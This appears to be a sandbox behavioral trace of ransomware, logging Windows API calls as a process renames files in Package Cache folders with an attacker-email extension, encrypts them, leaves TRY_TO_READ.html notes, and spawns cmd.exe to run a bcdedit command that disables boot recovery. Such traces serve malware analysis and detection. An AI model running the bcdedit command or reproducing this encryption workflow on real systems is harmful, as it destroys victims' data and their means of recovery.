	[0107.699] WriteFile (in: hFile=0x5b0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.699] ReadFile (in: hFile=0x5b0, lpBuffer=0x3a20048, nNumberOfBytesToRead=0x2fe, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesRead=0x3a1f778*=0x2fe, lpOverlapped=0x0) returned 1
	[0107.699] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=-766, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0107.699] WriteFile (in: hFile=0x5b0, lpBuffer=0x5fb388*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesWritten=0x3a1f778*=0x2fe, lpOverlapped=0x0) returned 1
	[0107.700] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0720
	[0107.700] FindNextFileW (in: hFindFile=0x37b0720, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.700] FindNextFileW (in: hFindFile=0x37b0720, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcad7040, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x105e7220, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x29a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1
	[0107.700] FindNextFileW (in: hFindFile=0x37b0720, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c44270, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.700] FindNextFileW (in: hFindFile=0x37b0720, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xca64c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xfe5c3760, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1
	[0107.700] FindNextFileW (in: hFindFile=0x37b0720, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xca64c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xfe5c3760, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0
	[0107.700] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.700] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.700] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe", dwFileAttributes=0x80) returned 1
	[0107.701] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 89
	[0107.701] GetProcessHeap () returned 0x540000
	[0107.701] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x118) returned 0x57fb28
	[0107.701] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"
	[0107.701] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.701] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.709] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b4
	[0107.709] GetProcessHeap () returned 0x540000
	[0107.709] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.709] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=462976) returned 1
	[0107.709] SetFilePointer (in: hFile=0x5b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x71080
	[0107.710] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.710] GetProcessHeap () returned 0x540000
	[0107.710] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.710] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.710] WriteFile (in: hFile=0x5b4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.712] WriteFile (in: hFile=0x5b4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.712] WriteFile (in: hFile=0x5b4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.715] ReadFile (in: hFile=0x5b4, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x71080, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x71080, lpOverlapped=0x0) returned 1
	[0107.731] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.731] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.731] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", dwFileAttributes=0x80) returned 1
	[0107.731] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 82
	[0107.731] GetProcessHeap () returned 0x540000
	[0107.731] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0107.731] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"
	[0107.731] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.731] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.747] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b4
	[0107.747] GetProcessHeap () returned 0x540000
	[0107.747] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.747] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=666) returned 1
	[0107.747] SetFilePointer (in: hFile=0x5b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x29a
	[0107.747] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.747] GetProcessHeap () returned 0x540000
	[0107.747] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.747] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.750] WriteFile (in: hFile=0x5b4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.804] WriteFile (in: hFile=0x5b4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.804] WriteFile (in: hFile=0x5b4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.804] ReadFile (in: hFile=0x5b4, lpBuffer=0x5db0d8, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db0d8*, lpNumberOfBytesRead=0x3a1f778*=0x29a, lpOverlapped=0x0) returned 1
	[0107.804] SetFilePointer (in: hFile=0x5b4, lDistanceToMove=-666, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0107.804] WriteFile (in: hFile=0x5b4, lpBuffer=0x3a20048*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesWritten=0x3a1f778*=0x29a, lpOverlapped=0x0) returned 1
	[0107.804] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0760
	[0107.804] FindNextFileW (in: hFindFile=0x37b0760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.805] FindNextFileW (in: hFindFile=0x37b0760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93efac0, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x6601040, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1
	[0107.805] FindNextFileW (in: hFindFile=0x37b0760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c44270, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.805] FindNextFileW (in: hFindFile=0x37b0760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93c9960, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xedfa2720, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0xbee30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1
	[0107.805] FindNextFileW (in: hFindFile=0x37b0760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93c9960, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xedfa2720, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0xbee30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0
	[0107.805] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.805] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.805] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe", dwFileAttributes=0x80) returned 1
	[0107.805] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 90
	[0107.805] GetProcessHeap () returned 0x540000
	[0107.805] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x11a) returned 0x57fb28
	[0107.805] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe"
	[0107.805] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.805] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) 

Process:
	id = "2"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x15f04000"
	os_pid = "0x3f8"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "1"
	os_parent_pid = "0x958"
	cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Local Service"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7]


Thread:
	id = 8
	os_tid = 0x76c


Thread:
	id = 9
	os_tid = 0x758


Thread:
	id = 10
	os_tid = 0x74c


Thread:
	id = 11
	os_tid = 0x72c


Thread:
	id = 12
	os_tid = 0x71c


Thread:
	id = 13
	os_tid = 0x718


Thread:
	id = 14
	os_tid = 0x638


Thread:
	id = 15
	os_tid = 0x154


Thread:
	id = 16
	os_tid = 0x150


Thread:
	id = 17
	os_tid = 0x128


Thread:
	id = 18
	os_tid = 0x12c


Thread:
	id = 19
	os_tid = 0x120


Thread:
	id = 20
	os_tid = 0x3fc


Thread:
	id = 133
	os_tid = 0xb6c


Process:
	id = "3"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x5041c000"
	os_pid = "0x998"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x958"
	cmd_line = "/C bcdedit /set {default} bootstatuspolicy ignoreallfailures"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 23
	os_tid = 0x99c

	[0033.357] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f8e0 | out: lpSystemTimeAsFileTime=0x24f8e0*(dwLowDateTime=0xc1b419b0, dwHighDateTime=0x1d5956c)) 
	[0033.357] GetCurrentProcessId () returned 0x998
	[0033.357] GetCurrentThreadId () returned 0x99c
	[0033.357] GetTickCount () returned 0x1142a5b
	[0033.357] QueryPerformanceCounter (in: lpPerformanceCount=0x24f8e8 | out: lpPerformanceCount=0x24f8e8*=15346220328) returned 1
	[0033.358] GetModuleHandleW (lpModuleName=0x0) returned 0x4a3b0000
	[0033.358] __set_app_type (_Type=0x1) 
	[0033.358] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3d7810) returned 0x0
	[0033.359] __getmainargs (in: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610, _DoWildCard=0, _StartInfo=0x4a3de0f4 | out: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610) returned 0
	[0033.359] GetCurrentThreadId () returned 0x99c
	[0033.359] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x99c) returned 0x3c
	[0033.359] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.359] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40
	[0033.359] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0033.658] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0033.659] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f878 | out: phkResult=0x24f878*=0x0) returned 0x2
	[0033.659] VirtualQuery (in: lpAddress=0x24f860, lpBuffer=0x24f7e0, dwLength=0x30 | out: lpBuffer=0x24f7e0*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.659] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f7e0, dwLength=0x30 | out: lpBuffer=0x24f7e0*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.659] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f7e0, dwLength=0x30 | out: lpBuffer=0x24f7e0*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.659] VirtualQuery (in: lpAddress=0x154000, lpBuffer=0x24f7e0, dwLength=0x30 | out: lpBuffer=0x24f7e0*(BaseAddress=0x154000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.659] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f7e0, dwLength=0x30 | out: lpBuffer=0x24f7e0*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
